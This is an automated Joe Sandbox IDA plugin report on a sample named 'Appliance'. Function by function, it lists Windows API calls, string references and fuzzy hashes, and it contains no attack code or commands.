Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: cc5edd4d4ec091789ae785a0c4a365954e9f57f1721ecba80e1c6a8e71b58dbb
Instruction ID: e2633a8ebc4f466170d3cd62c0217e30d13ca9928e89cea65128730eb0390d6e
Opcode Fuzzy Hash: cc5edd4d4ec091789ae785a0c4a365954e9f57f1721ecba80e1c6a8e71b58dbb
Instruction Fuzzy Hash: C141A934A00348ABCF10EF5AC849ABE7BB5EF45354F188199E8196B392D731DB15CBB1

Function 00E2D7AB Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00E2E6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00E2D7CD,?), ref: 00E2E714

Part of subcall function 00E2E6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00E2D7CD,?), ref: 00E2E72D

lstrcmpiW.KERNEL32(?,?), ref: 00E2D7F0
MoveFileW.KERNEL32(?,?), ref: 00E2D82A
_wcslen.LIBCMT ref: 00E2D8B0
_wcslen.LIBCMT ref: 00E2D8C6
SHFileOperationW.SHELL32(?), ref: 00E2D90C

Strings

\*.*, xrefs: 00E2D89E

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
String ID: \*.*
API String ID: 3164238972-1173974218
Opcode ID: 77e81b1db5f9c357432bba3eb24e58d8ea167a02ec89c8ee4988bea6eb2bd383
Instruction ID: 97b2c628f781cb3b370d178227f4b529803023aa1024a1408915c0e49d540370
Opcode Fuzzy Hash: 77e81b1db5f9c357432bba3eb24e58d8ea167a02ec89c8ee4988bea6eb2bd383
Instruction Fuzzy Hash: 814158719092289EDF16EBA4DD85BDD77F8AF14340F1114EAA605F7141EB34A788CB50

Function 00E342B9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 00E34310
TranslateAcceleratorW.USER32(?,00000000,?), ref: 00E34367
TranslateMessage.USER32(?), ref: 00E34390
DispatchMessageW.USER32(?), ref: 00E3439A
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E343AB

Strings

(, xrefs: 00E3437D

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: Message$Translate$AcceleratorDispatchInputPeekState
String ID: (
API String ID: 2256411358-2063206799
Opcode ID: 31d7e5c27fab242bfd965b897934014e61366d5ee16a060c381886dbefbcd5d5
Instruction ID: aa976533f7cf062c465caec0d13a59f7b8b0e3cbaaffbe1e10e43c64d152e303
Opcode Fuzzy Hash: 31d7e5c27fab242bfd965b897934014e61366d5ee16a060c381886dbefbcd5d5
Instruction Fuzzy Hash: 3F3180B0504346EEEB39DB75D84DBB67FA8AB01309F04156ED562B31E0E365B889CB21

Function 00E53899 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00E538B8
GetWindowLongW.USER32(?,000000F0), ref: 00E538EB
GetWindowLongW.USER32(?,000000F0), ref: 00E53920
SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00E53952
SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00E5397C
GetWindowLongW.USER32(?,000000F0), ref: 00E5398D
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00E539A7

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: 53d6a3e77ba0f0da6962b6c898b15beed616842a6f138c4297f58ba2ce5764e2
Instruction ID: 7bc171304c9a73f73c2f4498a21b503dd9c6fa4fede5b99145f421efa0e8061f
Opcode Fuzzy Hash: 53d6a3e77ba0f0da6962b6c898b15beed616842a6f138c4297f58ba2ce5764e2
Instruction Fuzzy Hash: DE315974608241AFDB29CF69DC84F6837A0FB8A356F142565FA00AB2B5C7B0A94CCB01

Function 00E2808D Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00E280D0
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00E280F6
SysAllocString.OLEAUT32(00000000), ref: 00E280F9
SysAllocString.OLEAUT32(?), ref: 00E28117
SysFreeString.OLEAUT32(?), ref: 00E28120
StringFromGUID2.OLE32(?,?,00000028), ref: 00E28145
SysAllocString.OLEAUT32(?), ref: 00E28153

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 2dfcd697cd7a671816dd7902312ec342e80d65615774ed9c01133989c48408fb
Instruction ID: cf039506c55f1574973e7df970090fab81479670cc673ef9a56b2343fa501b9a
Opcode Fuzzy Hash: 2dfcd697cd7a671816dd7902312ec342e80d65615774ed9c01133989c48408fb
Instruction Fuzzy Hash: EA21B872606229AFDF14DFA9DC84CBB77ACEB093647048425F915EB2D0DA74DC46C760

Function 00E28164 Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00E281A9
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00E281CF
SysAllocString.OLEAUT32(00000000), ref: 00E281D2
SysAllocString.OLEAUT32 ref: 00E281F3
SysFreeString.OLEAUT32 ref: 00E281FC
StringFromGUID2.OLE32(?,?,00000028), ref: 00E28216
SysAllocString.OLEAUT32(?), ref: 00E28224

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: e9e1ba38434d772681ab1cfa8c7602511419507d60942c32c614e0bd9c17eee2
Instruction ID: 136b1a88c88529b4451b0bc4d2f874cd53a398cf8816fc27465ed4eb2d0bf3cc
Opcode Fuzzy Hash: e9e1ba38434d772681ab1cfa8c7602511419507d60942c32c614e0bd9c17eee2
Instruction Fuzzy Hash: 7621C832605214BFDB14EFB9FC89DAA77ECEB093647048125F915EB1A0DA70EC41C764

Function 00E30E79 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 00E30E99
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00E30ED5

Strings

nul, xrefs: 00E30F0E

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: 3db2f16fa85bf8791feffaa9702b9ab986a58a5713cbe7794d799f0e19ca4fbb
Instruction ID: 5f7f9ed46949aa599b24cd9d653fe36e44a4dc84b9338d8fedda0edfba871ea3
Opcode Fuzzy Hash: 3db2f16fa85bf8791feffaa9702b9ab986a58a5713cbe7794d799f0e19ca4fbb
Instruction Fuzzy Hash: E9216B7460430AAFDB309F29DC18A9A7BE8BF54724F204A59FCA5F72E0D770A840CB50

Function 00E30F4E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00E30F6D
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00E30FA8

Strings

nul, xrefs: 00E30FE0

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: 06c67531e6ce006997679e016c2e91f04808fa58551cc6c643e27e53a76f8241
Instruction ID: 7bae1b3d966f892c5114f572de01e0e8877f4713b7264a90da5bfeb614b31020
Opcode Fuzzy Hash: 06c67531e6ce006997679e016c2e91f04808fa58551cc6c643e27e53a76f8241
Instruction Fuzzy Hash: CF21B0356043059FDB349F698C08A9A7BE8BF55728F201A6DF8A1F32E0DB70D880DB50

Function 00E54B4B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00DC7873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00DC78B1
Part of subcall function 00DC7873: GetStockObject.GDI32(00000011), ref: 00DC78C5
Part of subcall function 00DC7873: SendMessageW.USER32(00000000,00000030,00000000), ref: 00DC78CF

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00E54BB0
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00E54BBD
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00E54BC8
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00E54BD7
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00E54BE3

Strings

Msctls_Progress32, xrefs: 00E54B81

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: b6e9d63f618e6e818327779ea1916cbd189bc1888acccd0e11cae1c378ba58d8
Instruction ID: efce7a1d449cd63a14debb30dda2512aa2820ead41de29ae6471e94e8f577769
Opcode Fuzzy Hash: b6e9d63f618e6e818327779ea1916cbd189bc1888acccd0e11cae1c378ba58d8
Instruction Fuzzy Hash: 811193B2550219BEEF119E65CC85EE77FADEF08758F015111BA08A2090CA71DC659BA0

Function 00DFDB5F Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00DFDB23: _free.LIBCMT ref: 00DFDB4C

_free.LIBCMT ref: 00DFDBAD

Part of subcall function 00DF2D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00DFDB51,00E91DC4,00000000,00E91DC4,00000000,?,00DFDB78,00E91DC4,00000007,00E91DC4,?,00DFDF75,00E91DC4), ref: 00DF2D4E
Part of subcall function 00DF2D38: GetLastError.KERNEL32(00E91DC4,?,00DFDB51,00E91DC4,00000000,00E91DC4,00000000,?,00DFDB78,00E91DC4,00000007,00E91DC4,?,00DFDF75,00E91DC4,00E91DC4), ref: 00DF2D60

_free.LIBCMT ref: 00DFDBB8
_free.LIBCMT ref: 00DFDBC3
_free.LIBCMT ref: 00DFDC17
_free.LIBCMT ref: 00DFDC22
_free.LIBCMT ref: 00DFDC2D
_free.LIBCMT ref: 00DFDC38

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 98b13fc91f4fe31fecb0273d364a71dd69e1171f55120a532e903f65f4669862
Instruction ID: 26cfbccdfbd7c3191d47064e5ca4aa48f12ed25c94c6a32c07c6dfd147a0cbfc
Opcode Fuzzy Hash: 98b13fc91f4fe31fecb0273d364a71dd69e1171f55120a532e903f65f4669862
Instruction Fuzzy Hash: 7911907254170CA6D521BF70CC07FEB77EEDF04301F428C58B7A9AA152C625BA404770

Function 00E26078 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 00E2608D
_memcmp.LIBVCRUNTIME ref: 00E260AB
_memcmp.LIBVCRUNTIME ref: 00E260BE
_memcmp.LIBVCRUNTIME ref: 00E260D6
_memcmp.LIBVCRUNTIME ref: 00E260EE

Strings

j`, xrefs: 00E2609B

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: _memcmp
String ID: j`
API String ID: 2931989736-1521845545
Opcode ID: c8e2b5aa021f9047d7dfe0ff578116f5701035802969f4711a5bacbd0ec857a3
Instruction ID: 411991bd3b6be18dbf87e7437bb77d3c513e5e18b5f892a7ca5e1be4c83f991d
Opcode Fuzzy Hash: c8e2b5aa021f9047d7dfe0ff578116f5701035802969f4711a5bacbd0ec857a3
Instruction Fuzzy Hash: EE019EB6741326BBD6207621BC82EAB735DEE50B9CB005121FE0ABA241E771ED50D2B1

Function 00E2E30E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00E2E328
LoadStringW.USER32(00000000), ref: 00E2E32F
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00E2E345
LoadStringW.USER32(00000000), ref: 00E2E34C
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00E2E390

Strings

%s (%d) : ==> %s: %s %s, xrefs: 00E2E36D

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: HandleLoadModuleString$Message
String ID: %s (%d) : ==> %s: %s %s
API String ID: 4072794657-3128320259
Opcode ID: 0c0e23016a091a31946f148220c7428284d406d205f79fcb7cb9a111aa79c9d9
Instruction ID: 4db3954c314141a40b3b92f88988e88ff0f6f05fb3e88c003a8541ac404456cb
Opcode Fuzzy Hash: 0c0e23016a091a31946f148220c7428284d406d205f79fcb7cb9a111aa79c9d9
Instruction Fuzzy Hash: 860186F2904318BFE721A7A49D89EE7776CD708302F004991B749F6041EA749E894B71

Function 00E31312 Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 00E31322
EnterCriticalSection.KERNEL32(00000000,?), ref: 00E31334
TerminateThread.KERNEL32(00000000,000001F6), ref: 00E31342
WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00E31350
CloseHandle.KERNEL32(00000000), ref: 00E3135F
InterlockedExchange.KERNEL32(?,000001F6), ref: 00E3136F
LeaveCriticalSection.KERNEL32(00000000), ref: 00E31376

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: 35684373630c41bf1a3e27eaf190778775a2876a76901e4fb14f13bb6b337b2f
Instruction ID: d88fadcee0e387c6b95805970f6f5f28675148bc98ecc2bad33965734a3c96d9
Opcode Fuzzy Hash: 35684373630c41bf1a3e27eaf190778775a2876a76901e4fb14f13bb6b337b2f
Instruction Fuzzy Hash: 86F0C932046B12AFD7651B55EE8DBD6BB39BF04306F402525F101E5CB08B7594B9CF91

Function 00E426BD Relevance: 9.3, APIs: 6, Instructions: 298networkCOMMON

Download Yara Rule

APIs

__WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00E4281D
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00E4283E
WSAGetLastError.WSOCK32 ref: 00E4284F
htons.WSOCK32(?,?,?,?,?), ref: 00E42938
inet_ntoa.WSOCK32(?), ref: 00E428E9

Part of subcall function 00E2433E: _strlen.LIBCMT ref: 00E24348

Part of subcall function 00E43C81: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,00E3F669), ref: 00E43C9D

_strlen.LIBCMT ref: 00E42992

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
String ID:
API String ID: 3203458085-0
Opcode ID: cbca9dc4a6d99ca2ceb5a86e0b0bf3eb0792e86250f2e7d2da235d6a74fa712a
Instruction ID: 2b6cac6b1c336d09fe0d077138a0d553400c452b923e576f31b476936e0bb1f7
Opcode Fuzzy Hash: cbca9dc4a6d99ca2ceb5a86e0b0bf3eb0792e86250f2e7d2da235d6a74fa712a
Instruction Fuzzy Hash: BCB10431604301AFD324DF24D885F2ABBE5EF84318F94954CF5566B2A2DB31ED45CBA1

Function 00DF0527 Relevance: 9.3, APIs: 6, Instructions: 269COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 00DF042A
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00DF0446
__allrem.LIBCMT ref: 00DF045D
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00DF047B
__allrem.LIBCMT ref: 00DF0492
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00DF04B0

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
String ID:
API String ID: 1992179935-0
Opcode ID: f879b393e65d4db2631db90962c4ab5633f4520d067d5efed2ccc62c0ef88ee5
Instruction ID: f2d5ff9063a187efe007bca34c5550fdd2d1989a1c83fc21359a0d28307e2743
Opcode Fuzzy Hash: f879b393e65d4db2631db90962c4ab5633f4520d067d5efed2ccc62c0ef88ee5
Instruction Fuzzy Hash: 6E81C871A0070EABD724AF69CC41B7A77E8EF54324F2AC12AE711D7682E770D94087B4

Function 00DF6571 Relevance: 9.2, APIs: 6, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00DE8649,00DE8649,?,?,?,00DF67C2,00000001,00000001,8BE85006), ref: 00DF65CB
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00DF67C2,00000001,00000001,8BE85006,?,?,?), ref: 00DF6651
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00DF674B
__freea.LIBCMT ref: 00DF6758

Part of subcall function 00DF3B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00DE6A79,?,0000015D,?,?,?,?,00DE85B0,000000FF,00000000,?,?), ref: 00DF3BC5

__freea.LIBCMT ref: 00DF6761
__freea.LIBCMT ref: 00DF6786

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: fb340feaa4a7a885df64f5fddf51ef890198eb2dc7b8c20d0124604ff01f2f15
Instruction ID: aad2ea0481d71af3da070297aee2e76f2e97d3e4f94f9a411c09a299938e2e9d
Opcode Fuzzy Hash: fb340feaa4a7a885df64f5fddf51ef890198eb2dc7b8c20d0124604ff01f2f15
Instruction Fuzzy Hash: 8151277260020EAFDB249F60CD85EBF77A9EB40754F1A8668FE04D6940EB35DC54C6B0

Function 00E4C63B Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00DCB329: _wcslen.LIBCMT ref: 00DCB333

Part of subcall function 00E4D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00E4C10E,?,?), ref: 00E4D415
Part of subcall function 00E4D3F8: _wcslen.LIBCMT ref: 00E4D451
